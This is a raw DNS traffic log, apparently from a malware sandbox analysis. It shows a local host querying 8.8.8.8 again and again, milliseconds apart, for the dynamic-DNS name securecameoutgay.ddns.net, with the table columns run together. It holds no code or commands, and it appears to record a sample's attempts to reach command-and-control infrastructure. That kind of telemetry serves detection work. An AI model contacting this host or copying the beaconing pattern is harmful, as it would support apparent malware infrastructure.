                                                    Oct 12, 2024 23:05:26.223217010 CEST192.168.2.148.8.8.80xe977Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.230137110 CEST192.168.2.148.8.8.80xe977Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.238771915 CEST192.168.2.148.8.8.80xe977Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.246316910 CEST192.168.2.148.8.8.80xe977Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.252999067 CEST192.168.2.148.8.8.80x6460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.261787891 CEST192.168.2.148.8.8.80x6460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.268412113 CEST192.168.2.148.8.8.80x6460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.275227070 CEST192.168.2.148.8.8.80x6460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.282167912 CEST192.168.2.148.8.8.80x6460Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.289336920 CEST192.168.2.148.8.8.80x9dd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.295780897 CEST192.168.2.148.8.8.80x9dd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.302757978 CEST192.168.2.148.8.8.80x9dd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.309150934 CEST192.168.2.148.8.8.80x9dd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.316160917 CEST192.168.2.148.8.8.80x9dd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.322813034 CEST192.168.2.148.8.8.80x2635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.329458952 CEST192.168.2.148.8.8.80x2635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.336774111 CEST192.168.2.148.8.8.80x2635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.343527079 CEST192.168.2.148.8.8.80x2635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.350446939 CEST192.168.2.148.8.8.80x2635Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.357106924 CEST192.168.2.148.8.8.80x9135Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.363723993 CEST192.168.2.148.8.8.80x9135Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.370356083 CEST192.168.2.148.8.8.80x9135Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.377324104 CEST192.168.2.148.8.8.80x9135Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.383984089 CEST192.168.2.148.8.8.80x9135Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.391258001 CEST192.168.2.148.8.8.80x3d98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.397768021 CEST192.168.2.148.8.8.80x3d98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.404628992 CEST192.168.2.148.8.8.80x3d98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.411056995 CEST192.168.2.148.8.8.80x3d98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.417979956 CEST192.168.2.148.8.8.80x3d98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.425138950 CEST192.168.2.148.8.8.80xa5f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.431602001 CEST192.168.2.148.8.8.80xa5f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.437788963 CEST192.168.2.148.8.8.80xa5f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.444535971 CEST192.168.2.148.8.8.80xa5f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.451220989 CEST192.168.2.148.8.8.80xa5f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.457640886 CEST192.168.2.148.8.8.80xe4eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.463865995 CEST192.168.2.148.8.8.80xe4eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.470396042 CEST192.168.2.148.8.8.80xe4eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.477129936 CEST192.168.2.148.8.8.80xe4eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.483701944 CEST192.168.2.148.8.8.80xe4eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.490485907 CEST192.168.2.148.8.8.80x6ac6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.496944904 CEST192.168.2.148.8.8.80x6ac6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.503442049 CEST192.168.2.148.8.8.80x6ac6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.510642052 CEST192.168.2.148.8.8.80x6ac6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.517678976 CEST192.168.2.148.8.8.80x6ac6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.524203062 CEST192.168.2.148.8.8.80xe42dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.530565977 CEST192.168.2.148.8.8.80xe42dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.537385941 CEST192.168.2.148.8.8.80xe42dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.543901920 CEST192.168.2.148.8.8.80xe42dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.550618887 CEST192.168.2.148.8.8.80xe42dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.556802034 CEST192.168.2.148.8.8.80x9abeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.563762903 CEST192.168.2.148.8.8.80x9abeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.570835114 CEST192.168.2.148.8.8.80x9abeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.579947948 CEST192.168.2.148.8.8.80x9abeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.589896917 CEST192.168.2.148.8.8.80x9abeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.596596956 CEST192.168.2.148.8.8.80x1a36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.602874041 CEST192.168.2.148.8.8.80x1a36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.609308004 CEST192.168.2.148.8.8.80x1a36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.615832090 CEST192.168.2.148.8.8.80x1a36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.622421026 CEST192.168.2.148.8.8.80x1a36Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.628807068 CEST192.168.2.148.8.8.80x8c97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.635476112 CEST192.168.2.148.8.8.80x8c97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.641911030 CEST192.168.2.148.8.8.80x8c97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.649612904 CEST192.168.2.148.8.8.80x8c97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.656450033 CEST192.168.2.148.8.8.80x8c97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.663614988 CEST192.168.2.148.8.8.80x6b95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.670635939 CEST192.168.2.148.8.8.80x6b95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.677014112 CEST192.168.2.148.8.8.80x6b95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.683855057 CEST192.168.2.148.8.8.80x6b95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.691097021 CEST192.168.2.148.8.8.80x6b95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.698019028 CEST192.168.2.148.8.8.80x76e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.704555988 CEST192.168.2.148.8.8.80x76e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.711456060 CEST192.168.2.148.8.8.80x76e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.718368053 CEST192.168.2.148.8.8.80x76e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.725147009 CEST192.168.2.148.8.8.80x76e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.731497049 CEST192.168.2.148.8.8.80xd05dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.738045931 CEST192.168.2.148.8.8.80xd05dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.744837046 CEST192.168.2.148.8.8.80xd05dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.751866102 CEST192.168.2.148.8.8.80xd05dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.758567095 CEST192.168.2.148.8.8.80xd05dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.766902924 CEST192.168.2.148.8.8.80x3074Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.773542881 CEST192.168.2.148.8.8.80x3074Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.780365944 CEST192.168.2.148.8.8.80x3074Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.787364006 CEST192.168.2.148.8.8.80x3074Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.794384003 CEST192.168.2.148.8.8.80x3074Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.801161051 CEST192.168.2.148.8.8.80xfdbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.814739943 CEST192.168.2.148.8.8.80xfdbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.821419001 CEST192.168.2.148.8.8.80xfdbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.827951908 CEST192.168.2.148.8.8.80xfdbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.835211992 CEST192.168.2.148.8.8.80xfdbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.842091084 CEST192.168.2.148.8.8.80xcd69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.848901033 CEST192.168.2.148.8.8.80xcd69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.856075048 CEST192.168.2.148.8.8.80xcd69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.862979889 CEST192.168.2.148.8.8.80xcd69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.869807005 CEST192.168.2.148.8.8.80xcd69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.876990080 CEST192.168.2.148.8.8.80xc227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.883934975 CEST192.168.2.148.8.8.80xc227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.890574932 CEST192.168.2.148.8.8.80xc227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.897458076 CEST192.168.2.148.8.8.80xc227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.906603098 CEST192.168.2.148.8.8.80xc227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.914663076 CEST192.168.2.148.8.8.80xdd27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.921885967 CEST192.168.2.148.8.8.80xdd27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.931149960 CEST192.168.2.148.8.8.80xdd27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.938559055 CEST192.168.2.148.8.8.80xdd27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.945137024 CEST192.168.2.148.8.8.80xdd27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.951596022 CEST192.168.2.148.8.8.80x782dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.957876921 CEST192.168.2.148.8.8.80x782dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.964329958 CEST192.168.2.148.8.8.80x782dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.971014977 CEST192.168.2.148.8.8.80x782dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.977632046 CEST192.168.2.148.8.8.80x782dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.985264063 CEST192.168.2.148.8.8.80xabcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.992079020 CEST192.168.2.148.8.8.80xabcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:26.998662949 CEST192.168.2.148.8.8.80xabcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.006253958 CEST192.168.2.148.8.8.80xabcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.012864113 CEST192.168.2.148.8.8.80xabcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.020248890 CEST192.168.2.148.8.8.80x326dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.027534008 CEST192.168.2.148.8.8.80x326dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.036427975 CEST192.168.2.148.8.8.80x326dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.046730042 CEST192.168.2.148.8.8.80x326dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.055905104 CEST192.168.2.148.8.8.80x326dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.065306902 CEST192.168.2.148.8.8.80x5511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.073780060 CEST192.168.2.148.8.8.80x5511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.082402945 CEST192.168.2.148.8.8.80x5511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.089148998 CEST192.168.2.148.8.8.80x5511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.096035004 CEST192.168.2.148.8.8.80x5511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.102530003 CEST192.168.2.148.8.8.80xd70eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.109802008 CEST192.168.2.148.8.8.80xd70eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.116808891 CEST192.168.2.148.8.8.80xd70eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.123296976 CEST192.168.2.148.8.8.80xd70eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.131926060 CEST192.168.2.148.8.8.80xd70eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.140360117 CEST192.168.2.148.8.8.80xd571Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.148448944 CEST192.168.2.148.8.8.80xd571Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.155266047 CEST192.168.2.148.8.8.80xd571Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.161784887 CEST192.168.2.148.8.8.80xd571Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.168586016 CEST192.168.2.148.8.8.80xd571Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.176856995 CEST192.168.2.148.8.8.80x5bc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.185408115 CEST192.168.2.148.8.8.80x5bc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.192017078 CEST192.168.2.148.8.8.80x5bc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.198378086 CEST192.168.2.148.8.8.80x5bc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.206648111 CEST192.168.2.148.8.8.80x5bc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.214169979 CEST192.168.2.148.8.8.80x4e74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.222143888 CEST192.168.2.148.8.8.80x4e74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.228951931 CEST192.168.2.148.8.8.80x4e74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.235990047 CEST192.168.2.148.8.8.80x4e74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.244131088 CEST192.168.2.148.8.8.80x4e74Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.251753092 CEST192.168.2.148.8.8.80x7b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.258716106 CEST192.168.2.148.8.8.80x7b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.265402079 CEST192.168.2.148.8.8.80x7b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.272017956 CEST192.168.2.148.8.8.80x7b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.278707027 CEST192.168.2.148.8.8.80x7b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.287090063 CEST192.168.2.148.8.8.80x1271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.293735027 CEST192.168.2.148.8.8.80x1271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.300452948 CEST192.168.2.148.8.8.80x1271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.306967020 CEST192.168.2.148.8.8.80x1271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.313710928 CEST192.168.2.148.8.8.80x1271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.320199966 CEST192.168.2.148.8.8.80xcbcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.326705933 CEST192.168.2.148.8.8.80xcbcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.333400011 CEST192.168.2.148.8.8.80xcbcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.340003967 CEST192.168.2.148.8.8.80xcbcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.346581936 CEST192.168.2.148.8.8.80xcbcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.353171110 CEST192.168.2.148.8.8.80x853cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.359808922 CEST192.168.2.148.8.8.80x853cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.366247892 CEST192.168.2.148.8.8.80x853cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.374041080 CEST192.168.2.148.8.8.80x853cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.382462978 CEST192.168.2.148.8.8.80x853cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.390176058 CEST192.168.2.148.8.8.80xda70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.396955013 CEST192.168.2.148.8.8.80xda70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.403429985 CEST192.168.2.148.8.8.80xda70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.409976959 CEST192.168.2.148.8.8.80xda70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.416218042 CEST192.168.2.148.8.8.80xda70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.423232079 CEST192.168.2.148.8.8.80x9a02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.430389881 CEST192.168.2.148.8.8.80x9a02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.436930895 CEST192.168.2.148.8.8.80x9a02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.443527937 CEST192.168.2.148.8.8.80x9a02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.450025082 CEST192.168.2.148.8.8.80x9a02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.456525087 CEST192.168.2.148.8.8.80x8515Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.463027954 CEST192.168.2.148.8.8.80x8515Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.469536066 CEST192.168.2.148.8.8.80x8515Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.476373911 CEST192.168.2.148.8.8.80x8515Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.482937098 CEST192.168.2.148.8.8.80x8515Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.489402056 CEST192.168.2.148.8.8.80xeba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.495850086 CEST192.168.2.148.8.8.80xeba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.502604961 CEST192.168.2.148.8.8.80xeba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.509021044 CEST192.168.2.148.8.8.80xeba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.515451908 CEST192.168.2.148.8.8.80xeba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.522386074 CEST192.168.2.148.8.8.80xda6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.529336929 CEST192.168.2.148.8.8.80xda6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.535983086 CEST192.168.2.148.8.8.80xda6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
